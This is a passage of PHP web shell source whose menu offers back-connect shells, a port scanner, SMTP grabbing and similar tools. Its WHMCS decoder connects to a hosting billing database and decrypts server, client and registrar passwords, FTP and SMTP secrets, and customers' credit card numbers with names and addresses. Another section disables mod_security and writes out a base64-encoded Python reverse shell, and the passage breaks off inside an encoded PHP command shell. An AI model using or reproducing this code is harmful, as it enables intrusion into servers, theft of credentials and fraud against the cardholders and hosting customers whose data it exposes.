1477. echo "<li> <a href='?dir=$dir&do=manjat'>WHM-User Checker</a> </li>";
1478. echo "</ul>";
1479. echo "</center>";
1480.  
1481. echo "<center><span style='font-size:30px; font-family:Fredericka the Great; color:#009900'>Reverse Domain ip Lookup</span></center>
1482. ";
1483. echo "<div id=result>";
1484. echo "<center><br><form><input type='text' size='60' placeholder='watch8x.com' name='setan' /><input type='hidden' name='do' value='tetangga'> &nbsp;<input type='submit' value='&nbsp;&check;&nbsp;'></form></center>";
1485. if(isset($_GET["setan"]))
1486. {
1487. $site = $_GET["setan"];
1488. $setan = "http://domains.yougetsignal.com/domains.php";
1489.  
1490. //Curl Function
1491. $ch = curl_init($setan);
1492. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
1493. curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$site&ket=");
1494. curl_setopt($ch, CURLOPT_HEADER, 0);
1495. curl_setopt($ch, CURLOPT_POST, 1);
1496. $resp = curl_exec($ch);
1497. $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
1498. $array = explode(",,", $resp);
1499. unset($array[0]);
1500. echo "<table style='margin: 0 auto'>";
1501. foreach($array as $lnk)
1502. {
1503. print "<tr><td><a style=\"color:#0f0;font-weight:bold;\" href='$lnk' target=_blank>$lnk</a></td></tr>";
1504. }
1505. echo "</table>";
1506. curl_close($ch);
1507. }
1508. }
1509. elseif($_GET['do'] == 'whmcs') {
1510. echo "<center>";
1511. echo "<ul>";
1512. echo "<li> <a href='?dir=$dir&do=bc'>Simple Back-Connect</a> </li>";
1513. echo "<li> <a href='?dir=$dir&do=pbc'>Perl Back-Connect</a> </li>";
1514. echo "<li> <a href='?dir=$dir&do=ptbc'>Python Back-Connect</a> </li>";
1515. echo "<li> <a href='?dir=$dir&do=portsc'>Port Scanner</a> </li>";
1516. echo "<li> <a href='?dir=$dir&do=hash'>Hash Identification</a> </li>";
1517. echo "<li> <a href='?dir=$dir&do=whmcs'>WHMCS Decoder</a> </li>";
1518. echo "<li> <a href='?dir=$dir&do=tetangga'>Reverse Domain</a> </li>";
1519. echo "<li> <a href='?dir=$dir&do=wpes'>Auto Edit User WP</a> </li>";
1520. echo "<li> <a href='?dir=$dir&do=dos'>Domain On User</a> </li><br>";
1521. echo "<li> <a href='?dir=$dir&do=smtp'>VHosts SMTP Grabber</a> </li>";
1522. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF ONLINE</a> </li>";
1523. echo "<li> <a href='?dir=$dir&do=scdc'>Script Decoder</a> </li>";
1524. echo "<li> <a href='?dir=$dir&do=rdp'>RDP-Creator</a> </li>";
1525. echo "<li> <a href='?dir=$dir&do=manjat'>WHM-User Checker</a> </li>";
1526. echo "</ul>";
1527. echo "</center>";
1528.  
1529. echo"<p><br/><body>
1530. <center><br/><br/><nobr><b><span>WHMCS DECODER</span></b></nobr><br/><br/>
1531. <p><form method='post'>
1532. <table border=1>
1533. <tr><td>db_host </td><td><input type='text' style='color:#FF0000;background-color:transparent' size='60' name='anu1' value='localhost'></td></tr>
1534. <tr><td>db_username </td><td><input type='text' style='color:#FF0000;background-color:transparent' size='60' name='anu2'></td></tr>
1535. <tr><td>db_password</td><td><input type='text' style='color:#FF0000;background-color:transparent' size='60' name='anu3'></td></tr>
1536. <tr><td>db_name</td><td><input type='text' style='color:#FF0000;background-color:transparent' size='60' name='anu4'></td></tr>
1537. <tr><td>cc_encryption_hash</td><td><input style='color:#FF0000;background-color:transparent' type='text' size='60' name='anu5'></td></tr>
1538. <tr><td align='center' colspan='2'><input class=submit type='submit' style='color:#FF0000;background-color:transparent' value=' HAJAR ' name='plapon'></td></tr>
1539.  
1540. </table>
1541. <br></form></center>";
1542.  
1543.  
1544. $perawan = $_POST['anu1'];
1545. $kimcil = $_POST['anu2'];
1546. $janda = $_POST['anu3'];
1547. $hotel = $_POST['anu4'];
1548. $kondom = $_POST['anu5'];
1549. @mysql_connect($perawan, $kimcil, $janda);
1550. @mysql_select_db($hotel);
1551. $cc_encryption_hash = $kondom;
1552. function dec($string, $cc_encryption_hash) {
1553. $key = md5(md5($cc_encryption_hash)) . md5($cc_encryption_hash);
1554. $hash_key = _hash($key);
1555. $hash_length = strlen($hash_key);
1556. $string = base64_decode($string);
1557. $tmp_iv = substr($string, 0, $hash_length);
1558. $string = substr($string, $hash_length, strlen($string) - $hash_length);
1559. $iv = $out = '';
1560. $c = 0;
1561. while ($c < $hash_length) {
1562. $iv.= chr(ord($tmp_iv[$c]) ^ ord($hash_key[$c]));
1563. ++$c;
1564. }
1565. $key = $iv;
1566. $c = 0;
1567. while ($c < strlen($string)) {
1568. if (($c != 0 AND $c % $hash_length == 0)) {
1569. $key = _hash($key . substr($out, $c - $hash_length, $hash_length));
1570. }
1571. $out.= chr(ord($key[$c % $hash_length]) ^ ord($string[$c]));
1572. ++$c;
1573. }
1574. return $out;
1575. }
1576. function _hash($string) {
1577. $hash = (function_exists('sha1')) ? sha1($string) : md5($string);
1578. $out = '';
1579. $c = 0;
1580. while ($c < strlen($hash)) {
1581. $out.= chr(hexdec($hash[$c] . $hash[$c + 1]));
1582. $c+= 2;
1583. }
1584. return $out;
1585. }
1586. ######## GO TO HELL ########
1587. ##### :D ########### :D #####
1588. if (isset($_POST['plapon'])) {
1589. $query = mysql_query("SELECT *FROM tblservers");
1590. echo "<br/><br/><center><table class='table_home' style=width:830px;padding:0 1px;>
1591. <tr><th colspan='7'> <span> HOST ROOT </span> </th></tr>
1592. <tr>
1593. <th class='th_home' align='center'><b>TYPE</b></th>
1594. <th class='th_home' align='center'><b>ACTIVE</b></th>
1595. <th class='th_home' align='center'><b>HOSTNAME</b></th>
1596. <th class='th_home' align='center'><b>IP ADDRESS</b></th>
1597. <th class='th_home' align='center'><b>USERNAME</b></th>
1598. <th class='th_home' align='center'><b>PASSWORD</b></th>
1599. <th class='th_home' align='center'><b>ACCESS HASH</b></th></tr>";
1600. if (!is_array(mysql_fetch_array($query))) {
1601. echo "<tr><td colspan='8' align='center'>Nothing Found !</td></tr>";
1602. }
1603. while ($v = mysql_fetch_array($query)) {
1604. echo "<tr>
1605. <td class='td_home' align='center'>{$v['type']}</td>
1606. <td class='td_home' align='center'>{$v['active']}</td>
1607. <td class='td_home' align='center'>{$v['hostname']}</td>
1608. <td class='td_home' align='center'>{$v['ipaddress']}</td>
1609. <td class='td_home' align='center'>{$v['username']}</td>
1610. <td class='td_home' align='center'>" . dec($v['password'], $cc_encryption_hash) . "</td>
1611. <td class='td_home' align='center'>{$v['accesshash']}</td>
1612. </tr>";
1613. }
1614. echo "</table>";
1615. $query = mysql_query("SELECT * FROM tblhosting where username = 'root' or username = 'vmuserxx' or username = 'vmuser' or username = 'admin' or username = 'Admin' or username = 'administrator' or username = 'Administrator' order by domainstatus");
1616. echo "<br/><br/><center><table class='table_home' style=width:830px;padding:0 1px;>
1617. <tr><th colspan='6'><span>CLIENTS ROOT</span> </th></tr>
1618.  
1619. <tr>
1620. <th class='th_home' align='center'><b> DOMAIN</b></th>
1621. <th class='th_home' align='center'><b> STATUS</b></th>
1622. <th class='th_home' align='center'><b> USERNAME</b></th>
1623. <th class='th_home' align='center'><b> PASSWORD</b></th>
1624. <th class='th_home' align='center'><b> DEDICATED IP</b></th>
1625. <th class='th_home' align='center'><b> ASSIGNED IP</b></th></tr>";
1626. if (!is_array(mysql_fetch_array($query))) {
1627. echo "<tr><td colspan='6' align='center'>Nothing Found ! :(</td></tr>";
1628. }
1629. while ($v = mysql_fetch_array($query)) {
1630. echo "<tr>
1631. <td class='td_home' align='center'> {$v['domain']}</td>
1632. <td class='td_home' align='center'> {$v['domainstatus']}</td>
1633. <td class='td_home' align='center'> {$v['username']}</td>
1634. <td class='td_home' align='center'> " . dec($v['password'], $cc_encryption_hash) . "</td>
1635. <td class='td_home' align='center'> {$v['dedicatedip']}</td>
1636. <td class='td_home' align='center'> {$v['assignedips']}</td></tr>";
1637. }
1638. echo "</table>";
1639. $query = mysql_query("SELECT *FROM tblregistrars");
1640. echo "<br/><br/><center><table class='table_home' style=width:830px;padding:0 1px;>
1641. <tr><th colspan='3'><nobr><span> DOMAIN REGISTRAR </span></nobr></th></tr>
1642. <tr>
1643. <th class='th_home' align='center'><b>REGISTRAR</b></th>
1644. <th class='th_home' align='center'><b>SETTING</b></th>
1645. <th class='th_home' align='center'><b>VALUE</b></th></tr>";
1646. if (!is_array(mysql_fetch_array($query))) {
1647. echo "<tr><td colspan='3' align='center'>Nothing Found !</td></tr>";
1648. }
1649. while ($v = mysql_fetch_array($query)) {
1650. $value = (!dec($v['value'], $cc_encryption_hash)) ? "0" : dec($v['value'], $cc_encryption_hash);
1651. echo "<tr>
1652. <td class='td_home' align='center'>{$v['registrar']}</td>
1653. <td class='td_home' align='center'>{$v['setting']}</td>
1654. <td class='td_home' align='center'>$value</td></tr>";
1655. }
1656. echo "</table>";
1657. $query = mysql_query("SELECT * FROM tblconfiguration where 1");
1658. echo "<br/><br/><center><table class='table_home' style=width:830px;padding:0 1px;>
1659. <tr><th colspan='4'> <span> FTP BACKUP </span> </th></tr>
1660.  
1661. <tr>
1662. <th class='th_home' align='center'><b>FTP HOSTNAME</b></th>
1663. <th class='th_home' align='center'><b>FTP USERNAME</b></th>
1664. <th class='th_home' align='center'><b>FTP PASSWORD</b></th>
1665. <th class='th_home' align='center'><b>DESTINATION</b></th></tr>";
1666. $ftpb = array('FTPBackupHostname', 'FTPBackupUsername', 'FTPBackupPassword', 'FTPBackupDestination');
1667. if (!is_array(mysql_fetch_array($query))) {
1668. echo "<tr><td colspan='4' align='center'>Nothing Found ! :(</td></tr>";
1669. }
1670. while ($row = mysql_fetch_array($query)) {
1671. if ($row[setting] == $ftpb[0]) {
1672. echo "<tr><td class='td_home'>{$row[value]}</td>";
1673. $ftpb[0] = xxx;
1674. } elseif ($row[setting] == $ftpb[1]) {
1675. echo "<td class='td_home'>{$row[value]}</td>";
1676. $ftpb[1] = xxx;
1677. } elseif ($row[setting] == $ftpb[2]) {
1678. echo "<td class='td_home'>{$row[value]}</td>";
1679. $ftpb[2] = xxx;
1680. } elseif ($row[setting] == $ftpb[3]) {
1681. echo "<td class='td_home'>{$row[value]}</td>";
1682. $ftpb[3] = xxx;
1683. }
1684. }
1685. echo "</table>";
1686. $query = mysql_query("SELECT * FROM tblconfiguration where 1");
1687. echo "<br/><br/><center><table class='table_home' style=width:830px;padding:0 1px;>
1688. <tr><th colspan='4'><span> SMTP SERVER </span> </th></tr>
1689. <tr>
1690. <th class='th_home' align='center'><b>SMTP HOST</b></th>
1691. <th class='th_home' align='center'><b>SMTP USER</b></th>
1692. <th class='th_home' align='center'><b>SMTP PASS</b></th>
1693. <th class='th_home' align='center'><b>SMTP PORT</b></th></tr>";
1694. $smtp = array('SMTPHost', 'SMTPUsername', 'SMTPPassword', 'SMTPPort');
1695. if (!is_array(mysql_fetch_array($query))) {
1696. echo "<tr><td colspan='4' align='center'>Nothing Found ! :(</td></tr>";
1697. }
1698. while ($row = mysql_fetch_array($query)) {
1699. if ($row[setting] == $smtp[0]) {
1700. echo "<tr><td class='td_home'>{$row[value]}</td>";
1701. $smtp[0] = xxx;
1702. } elseif ($row[setting] == $smtp[1]) {
1703. echo "<td class='td_home'>{$row[value]}</td>";
1704. $smtp[1] = xxx;
1705. } elseif ($row[setting] == $smtp[2]) {
1706. echo "<td class='td_home'>{$row[value]}</td>";
1707. $smtp[2] = xxx;
1708. } elseif ($row[setting] == $smtp[3]) {
1709. echo "<td class='td_home'>{$row[value]}</td>";
1710. $smtp[3] = xxx;
1711. }
1712. }
1713. echo "</table>";
1714. $query = mysql_query("SELECT *FROM tblpaymentgateways");
1715. echo "<br/><br/><center><table class='table_home' style=width:830px;padding:0 1px;>
1716. <tr><th colspan='4'><nobr><span> PAYMENTS GATEWAY </span></nobr></th></tr>
1717.  
1718. <tr>
1719. <th class='th_home' align='center'><b>GATEWAY</b></th>
1720. <th class='th_home' align='center'><b>SETTING</b></th>
1721. <th class='th_home' align='center'><b>VALUE</b></th>
1722. <th class='th_home' align='center'><b>ORDER</b></th></tr>";
1723. if (!is_array(mysql_fetch_array($query))) {
1724. echo "<tr><td colspan='4' align='center'>Nothing Found !</td></tr>";
1725. }
1726. while ($v = mysql_fetch_array($query)) {
1727. echo "<tr>
1728. <td class='td_home' align='center'>{$v['gateway']}</td>
1729. <td class='td_home' align='center'>{$v['setting']}</td>
1730. <td class='td_home' align='center'>{$v['value']}</td>
1731. <td class='td_home' align='center'>{$v['order']}</td> </tr>";
1732. }
1733. echo "</table>";
1734. $query = mysql_query("SELECT id FROM tblclients WHERE issuenumber != '' ORDER BY id DESC");
1735. echo "<br/><br/><center><table class='table_home' style=width:830px;padding:0 1px;>
1736. <tr><th colspan='10'><nobr><span> CLIENTS CREDIT CARD </span></nobr></th></tr>
1737. <tr>
1738. <th class='th_home' align='center'><b>CardType</b></th>
1739. <th class='th_home' align='center'><b>CardNumb</b></th>
1740. <th class='th_home' align='center'><b>Expdate</b></th>
1741. <th class='th_home' align='center'><b>IssueNumber</b></th>
1742. <th class='th_home' align='center'><b>FirstName</b></th>
1743. <th class='th_home' align='center'><b>LastName</b></th>
1744. <th class='th_home' align='center'><b>Address</b></th>
1745. <th class='th_home' align='center'><b>Country</b></th>
1746. <th class='th_home' align='center'><b>Phone</b></th>
1747. <th class='th_home' align='center'><b>Email</b></th>
1748. </tr>";
1749. if (!is_array(mysql_fetch_array($query))) {
1750. echo "<tr><td colspan='10' align='center'>Nothing Found ! :(</td></tr>";
1751. }
1752. while ($v = mysql_fetch_array($query)) {
1753. $cchash = md5($cc_encryption_hash . $v['0']);
1754. $s = mysql_query("SELECT firstname,lastname,address1,country,phonenumber,cardtype,email,AES_DECRYPT(cardnum,'" . $cchash . "') as cardnum,AES_DECRYPT(expdate,'" . $cchash . "') as expdate,AES_DECRYPT(issuenumber,'" . $cchash . "') as issuenumber FROM tblclients WHERE id='" . $v['0'] . "'");
1755. $v2 = mysql_fetch_array($s);
1756. echo "<tr>
1757. <td class='td_home' align='center'>" . $v2['cardtype'] . "</td>
1758. <td class='td_home' align='center'>" . $v2['cardnum'] . "</td>
1759. <td class='td_home' align='center'>" . $v2['expdate'] . "</td>
1760. <td class='td_home' align='center'>" . $v2['issuenumber'] . "</td>
1761. <td class='td_home' align='center'>" . $v2['firstname'] . "</td>
1762. <td class='td_home' align='center'>" . $v2['lastname'] . "</td>
1763. <td class='td_home' align='center'>" . $v2['address1'] . "</td>
1764. <td class='td_home' align='center'>" . $v2['country'] . "</td>
1765. <td class='td_home' align='center'>" . $v2['phonenumber'] . "</td>
1766. <td class='td_home' align='center'>" . $v2['email'] . "</td></tr>";
1767. }
1768. echo "</table>";
1769. $query = mysql_query("SELECT *FROM tblhosting");
1770. echo "<br/><br/><center>
1771. <table class='table_home' style=width:830px;padding:0 1px;>
1772. <tr><th colspan='6'><nobr><span> CLIENTS HOSTING ACCOUNT </span></nobr></th></tr>
1773. <tr>
1774. <th class='th_home' align='center'><b>DOMAIN</b></th>
1775. <th class='th_home' align='center'><b>STATUS</b></th>
1776. <th class='th_home' align='center'><b>USERNAME</b></th>
1777. <th class='th_home' align='center'><b>PASSWORD</b></th>
1778. <th class='th_home' align='center'><b>DEDICATED IP</b></th>
1779. <th class='th_home' align='center'><b>ASSIGNED IP</b></th></tr>";
1780. if (!is_array(mysql_fetch_array($query))) {
1781. echo "<tr><td colspan='6' align='center'>Nothing Found !</td></tr>";
1782. }
1783. while ($v = mysql_fetch_array($query)) {
1784. echo "<tr>
1785. <td class='td_home' align='center'>{$v['domain']}</td>
1786. <td class='td_home' align='center'>{$v['domainstatus']}</td>
1787. <td class='td_home' align='center'>{$v['username']}</td>
1788. <td class='td_home' align='center'>" . dec($v['password'], $cc_encryption_hash) . "</td>
1789. <td class='td_home' align='center'>{$v['dedicatedip']}</td>
1790. <td class='td_home' align='center'>{$v['assignedips']}</td></tr>";
1791. }
1792. echo "</table>";
1793. }
1794. }
1795. elseif($_GET['do'] == 'hash') {
1796. echo "<center>";
1797. echo "<ul>";
1798. echo "<li> <a href='?dir=$dir&do=bc'>Simple Back-Connect</a> </li>";
1799. echo "<li> <a href='?dir=$dir&do=pbc'>Perl Back-Connect</a> </li>";
1800. echo "<li> <a href='?dir=$dir&do=ptbc'>Python Back-Connect</a> </li>";
1801. echo "<li> <a href='?dir=$dir&do=portsc'>Port Scanner</a> </li>";
1802. echo "<li> <a href='?dir=$dir&do=hash'>Hash Identification</a> </li>";
1803. echo "<li> <a href='?dir=$dir&do=whmcs'>WHMCS Decoder</a> </li>";
1804. echo "<li> <a href='?dir=$dir&do=tetangga'>Reverse Domain</a> </li>";
1805. echo "<li> <a href='?dir=$dir&do=wpes'>Auto Edit User WP</a> </li>";
1806. echo "<li> <a href='?dir=$dir&do=dos'>Domain On User</a> </li><br>";
1807. echo "<li> <a href='?dir=$dir&do=smtp'>VHosts SMTP Grabber</a> </li>";
1808. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF ONLINE</a> </li>";
1809. echo "<li> <a href='?dir=$dir&do=scdc'>Script Decoder</a> </li>";
1810. echo "<li> <a href='?dir=$dir&do=rdp'>RDP-Creator</a> </li>";
1811. echo "<li> <a href='?dir=$dir&do=manjat'>WHM-User Checker</a> </li>";
1812. echo "</ul>";
1813. echo "</center>";
1814. if (isset($_POST['gethash'])) {
1815. $hash = $_POST['hash'];
1816. if (strlen($hash) == 32) {
1817. $hashresult = "MD5 Hash";
1818. } elseif (strlen($hash) == 40) {
1819. $hashresult = "SHA-1 Hash/ /MySQL5 Hash";
1820. } elseif (strlen($hash) == 13) {
1821. $hashresult = "DES(Unix) Hash";
1822. } elseif (strlen($hash) == 16) {
1823. $hashresult = "MySQL Hash / /DES(Oracle Hash)";
1824. } elseif (strlen($hash) == 41) {
1825. $GetHashChar = substr($hash, 40);
1826. if ($GetHashChar == "*") {
1827. $hashresult = "MySQL5 Hash";
1828. }
1829. } elseif (strlen($hash) == 64) {
1830. $hashresult = "SHA-256 Hash";
1831. } elseif (strlen($hash) == 96) {
1832. $hashresult = "SHA-384 Hash";
1833. } elseif (strlen($hash) == 128) {
1834. $hashresult = "SHA-512 Hash";
1835. } elseif (strlen($hash) == 34) {
1836. if (strstr($hash, '$1$')) {
1837. $hashresult = "MD5(Unix) Hash";
1838. }
1839. } elseif (strlen($hash) == 37) {
1840. if (strstr($hash, '$apr1$')) {
1841. $hashresult = "MD5(APR) Hash";
1842. }
1843. } elseif (strlen($hash) == 34) {
1844. if (strstr($hash, '$H$')) {
1845. $hashresult = "MD5(phpBB3) Hash";
1846. }
1847. } elseif (strlen($hash) == 34) {
1848. if (strstr($hash, '$P$')) {
1849. $hashresult = "MD5(Wordpress) Hash";
1850. }
1851. } elseif (strlen($hash) == 39) {
1852. if (strstr($hash, '$5$')) {
1853. $hashresult = "SHA-256(Unix) Hash";
1854. }
1855. } elseif (strlen($hash) == 39) {
1856. if (strstr($hash, '$6$')) {
1857. $hashresult = "SHA-512(Unix) Hash";
1858. }
1859. } elseif (strlen($hash) == 24) {
1860. if (strstr($hash, '==')) {
1861. $hashresult = "MD5(Base-64) Hash";
1862. }
1863. } else {
1864. $hashresult = "Hash type not found";
1865. }
1866. } else {
1867. $hashresult = "<center>Not Hash Entered</center>";
1868. }
1869.  
1870. echo"<center>
1871.  
1872. <form action='' method='POST'>
1873. <tr>
1874. <th colspan='5'>Hash Identification</th><br><br>
1875. <tr class='optionstr'><B><td>Enter Hash :</td><br></b><td></td> <td><input type='text' name='hash' size='60' class='inputz' /></td><td><input type='submit' class='inputzbut' name='gethash' value='Identify Hash' /></td></tr><br>
1876. <tr class='optionstr'><b><td>Result</td><td>:</td><td></td></tr></b>
1877. </tr></form>
1878. </center>";
1879. echo "<center>$hashresult</center>";
1880.  
1881. }
1882. elseif($_GET['do'] == 'portsc') {
1883. echo "<center>";
1884. echo "<ul>";
1885. echo "<li> <a href='?dir=$dir&do=bc'>Simple Back-Connect</a> </li>";
1886. echo "<li> <a href='?dir=$dir&do=pbc'>Perl Back-Connect</a> </li>";
1887. echo "<li> <a href='?dir=$dir&do=ptbc'>Python Back-Connect</a> </li>";
1888. echo "<li> <a href='?dir=$dir&do=portsc'>Port Scanner</a> </li>";
1889. echo "<li> <a href='?dir=$dir&do=hash'>Hash Identification</a> </li>";
1890. echo "<li> <a href='?dir=$dir&do=whmcs'>WHMCS Decoder</a> </li>";
1891. echo "<li> <a href='?dir=$dir&do=tetangga'>Reverse Domain</a> </li>";
1892. echo "<li> <a href='?dir=$dir&do=wpes'>Auto Edit User WP</a> </li>";
1893. echo "<li> <a href='?dir=$dir&do=dos'>Domain On User</a> </li><br>";
1894. echo "<li> <a href='?dir=$dir&do=smtp'>VHosts SMTP Grabber</a> </li>";
1895. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF ONLINE</a> </li>";
1896. echo "<li> <a href='?dir=$dir&do=scdc'>Script Decoder</a> </li>";
1897. echo "<li> <a href='?dir=$dir&do=rdp'>RDP-Creator</a> </li>";
1898. echo "<li> <a href='?dir=$dir&do=manjat'>WHM-User Checker</a> </li>";
1899. echo "</ul>";
1900. echo "</center>";
1901. echo"<form action='' method='post'>" ;
1902. $start = strip_tags($_POST['start']);
1903. $end = strip_tags($_POST['end']);
1904. $host = strip_tags($_POST['host']);
1905. if (isset($_POST['host']) && is_numeric($_POST['end']) && is_numeric($_POST['start'])) {
1906. for ($i = $start;$i <= $end;$i++) {
1907. $fp = @fsockopen($host, $i, $errno, $errstr, 3);
1908. if ($fp) {
1909. echo 'Port ' . $i . ' is <font color=green>open</font><br>';
1910. }
1911. flush();
1912. }
1913. } else {
1914. echo '<center><table class=tabnet style="width:300px;padding:0 1px;">
1915. <input type="hidden" name="y" value="phptools">
1916. <tr><th colspan="5">Port Scanner</th></center></tr>
1917. <tr>
1918. <td>Host</td>
1919. <td><input type="text" class="inputz" style="width:220px;color:#00ff00;" name="host" value="localhost"/></td>
1920. </tr>
1921. <tr>
1922. <td>Port start</td>
1923. <td><input type="text" class="inputz" style="width:220px;color:#00ff00;" name="start" value="0"/></td>
1924. </tr>
1925. <tr><td>Port end</td>
1926. <td><input type="text" class="inputz" style="width:220px;color:#00ff00;" name="end" value="5000"/></td>
1927. </tr><td><center><input class="inputzbut" type="submit" style="color:#00ff00" value="Scan Ports" />
1928. </td></form></center></table>';
1929. }
1930.  
1931. }
1932. elseif($_GET['do'] == 'ptbc') {
1933. echo "<center>";
1934. echo "<ul>";
1935. echo "<li> <a href='?dir=$dir&do=bc'>Simple Back-Connect</a> </li>";
1936. echo "<li> <a href='?dir=$dir&do=pbc'>Perl Back-Connect</a> </li>";
1937. echo "<li> <a href='?dir=$dir&do=ptbc'>Python Back-Connect</a> </li>";
1938. echo "<li> <a href='?dir=$dir&do=portsc'>Port Scanner</a> </li>";
1939. echo "<li> <a href='?dir=$dir&do=hash'>Hash Identification</a> </li>";
1940. echo "<li> <a href='?dir=$dir&do=whmcs'>WHMCS Decoder</a> </li>";
1941. echo "<li> <a href='?dir=$dir&do=tetangga'>Reverse Domain</a> </li>";
1942. echo "<li> <a href='?dir=$dir&do=wpes'>Auto Edit User WP</a> </li>";
1943. echo "<li> <a href='?dir=$dir&do=dos'>Domain On User</a> </li><br>";
1944. echo "<li> <a href='?dir=$dir&do=smtp'>VHosts SMTP Grabber</a> </li>";
1945. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF ONLINE</a> </li>";
1946. echo "<li> <a href='?dir=$dir&do=scdc'>Script Decoder</a> </li>";
1947. echo "<li> <a href='?dir=$dir&do=rdp'>RDP-Creator</a> </li>";
1948. echo "<li> <a href='?dir=$dir&do=manjat'>WHM-User Checker</a> </li>";
1949. echo "</ul>";
1950. echo "</center>";
1951. mkdir('pyrevrshell', 0755);
1952. chdir('pyrevrshell');
1953. $seropil = ".htaccess";
1954. $angelinalll = "$seropil";
1955. $shitttyz = fopen ($angelinalll , 'w') or die ("shitttyz a&#231;&#305;lamad&#305;!");
1956. $dffvfdgfg = "<IfModule mod_security.c>
1957. SecFilterEngine Off
1958. SecFilterScanPOST Off
1959. </IfModule>";
1960. fwrite ( $shitttyz , $dffvfdgfg ) ;
1961. fclose ($shitttyz);
1962. //extract python reverse script
1963. $vkffhd = 'IyEvdXNyL2Jpbi9weXRob24NCmltcG9ydCBzeXMNCmltcG9ydCBvcw0KaW1wb3J0IHNvY2tldA0KaW1wb3J0IHB0eQ0KIA0Kc2hlbGwgPSAiL2Jpbi9zaCINCiANCmRlZiB1c2FnZShwcm9ncmFtbmFtZSk6DQpwcmludCAieXRob24gY29ubmVjdC1iYWNrIGRvb3IiDQpwcmludCAiVXNhZ2U6ICVzIDxjb25uX2JhY2tfaXA+IDxwb3J0PiIgJSBwcm9ncmFtbmFtZQ0KIA0KZGVmIG1haW4oKToNCmlmIGxlbihzeXMuYXJndikgIT0zOg0KdXNhZ2Uoc3lzLmFyZ3ZbMF0pDQpzeXMuZXhpdCgxKQ0KIA0KcyA9IHNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsc29ja2V0LlNPQ0tfU1RSRUFNKQ0KIA0KdHJ5Og0Kcy5jb25uZWN0KChzb2NrZXQuZ2V0aG9zdGJ5bmFtZShzeXMuYXJndlsxXSksaW50KHN5cy5hcmd2WzJdKSkpDQpwcmludCAiWytdQ29ubmVjdCBPSy4iDQpleGNlcHQ6DQpwcmludCAiWy1dQ2FuJ3QgY29ubmVjdCINCnN5cy5leGl0KDIpDQogDQpvcy5kdXAyKHMuZmlsZW5vKCksMCkNCm9zLmR1cDIocy5maWxlbm8oKSwxKQ0Kb3MuZHVwMihzLmZpbGVubygpLDIpDQpnbG9iYWwgc2hlbGwNCm9zLnVuc2V0ZW52KCJISVNURklMRSIpDQpvcy51bnNldGVudigiSElTVEZJTEVTSVpFIikNCnB0eS5zcGF3bihzaGVsbCkNCnMuY2xvc2UoKQ0KIA0KaWYgX19uYW1lX18gPT0gIl9fbWFpbl9fIjoNCm1haW4oKQ==';
1964.  
1965. $jkol = fopen("reversesh.py" ,"w+");
1966. $write = fwrite ($jkol ,base64_decode($vkffhd));
1967. fclose($jkol);
1968. chmod("reversesh.py",0755);
1969.  
1970. //extract php command shell
1971. $merdeeeee = 'PGh0bWw+PGhlYWQ+PHRpdGxlPkFub25HaG9zdCBQeXRob24gQ29ubmVjdCBTaGVsbCBQcml2ODwvdGl0bGU+PGxpbmsgcmVsPSJzaG9ydGN1dCBpY29uIiBocmVmPSJodHRwOi8vd3d3MTQuMHp6MC5jb20vMjAxNC8wNi8wNC8yMS8zOTY1NTQzOTQucG5nIiB0eXBlPSJpbWFnZS94LWljb24iIC8+PHN0eWxlIHR5cGU9InRleHQvY3NzIj4NCmJvZHl7IGJhY2tncm91bmQtY29sb3I6IHRyYW5zcGFyZW50ICFpbXBvcnRhbnQ7IGNvbG9yOiAjMDA5OTAwOyB0ZXh0LXNoYWRvdzojMDAwIDBweCAycHggN3B4O30gICAgICBhe3RleHQtZGVjb3JhdGlvbjpub25lOyBmb250LWZhbWlseTogVGFob21hLCBHZW5ldmE7IGNvbG9yOiMwMDc3MDA7IHBhZGRpbmc6MnB4IDJweDt9ICAgICAgYTpob3Zlcntjb2xvcjojMDA5OTAwOyB0ZXh0LXNoYWRvdzojMDBmZjAwIDBweCAwcHggM3B4O30JICAuYXJlYSB7IGNvbG9yOiAjMDBiYjAwOyBmb250LXNpemU6IDlwdDsgdGV4dC1zaGFkb3c6IzAwMDAwMCAwcHggMnB4IDdweDsgYm9yZGVyOiBzb2xpZCAwcHggIzAwNzcwMDsgYmFja2dyb3VuZC1jb2xvcjp0cmFuc3BhcmVudDsgYm94LXNoYWRvdzogMHB4IDBweCA0cHggIzAwOTkwMDsgICAgcGFkZGluZzogM3B4OyAgIC13ZWJraXQtYm9yZGVyLXJhZGl1czogNHB4OyAgIC1tb3otYm9yZGVyLXJhZGl1czogNHB4OyAgIGJvcmRlci1yYWRpdXM6IDRweDsgICAtd2Via2l0LWJveC1zaGFkb3c6IHJnYigwLDExOSwwKSAwcHggMHB4IDRweDsgICAtbW96LWJveC1zaGFkb3c6IHJnYigwLDExOSwwKSAwcHggMHB4IDRweDsgfQkgIGlucHV0W3R5cGU9c3VibWl0XXsgcGFkZGluZzogM3B4OyBjb2xvcjogIzAwNzcwOyAgZm9udC13ZWlnaHQ6IGJvbGQ7IHRleHQtYWxpZ246IGNlbnRlcjsgIHRleHQtc2hhZG93OiAwIDFweCByZ2JhKDI1NSwgMjU1LCAyNTUsIDAuMyk7ICBiYWNrZ3JvdW5kOiAjYWVhZWFlOyAgYmFja2dyb3VuZC1jbGlwOiBwYWRkaW5nLWJveDsgIGJvcmRlcjogMXB4IHNvbGlkICMyODQ0NzM7ICBib3JkZXItYm90dG9tLWNvbG9yOiAjMjIzYjY2OyAgYm9yZGVyLXJhZGl1czogNHB4OyAgY3Vyc29yOiBwb2ludGVyOyAgYmFja2dyb3VuZC1pbWFnZTotd2Via2l0LWxpbmVhci1ncmFkaWVudCh0b3AsICNlYWVhZWEsICNkMGQwZDApOyAgYmFja2dyb3VuZC1pbWFnZTogLW1vei1saW5lYXItZ3JhZGllbnQodG9wLCAjZWFlYWVhLCAjZDBkMGQwKTsgIGJhY2tncm91bmQtaW1hZ2U6IC1vLWxpbmVhci1ncmFkaWVudCh0b3AsICNlYWVhZWEsICNkMGQwZDApOyAgYmFja2dyb3VuZC1pbWFnZTogbGluZWFyLWd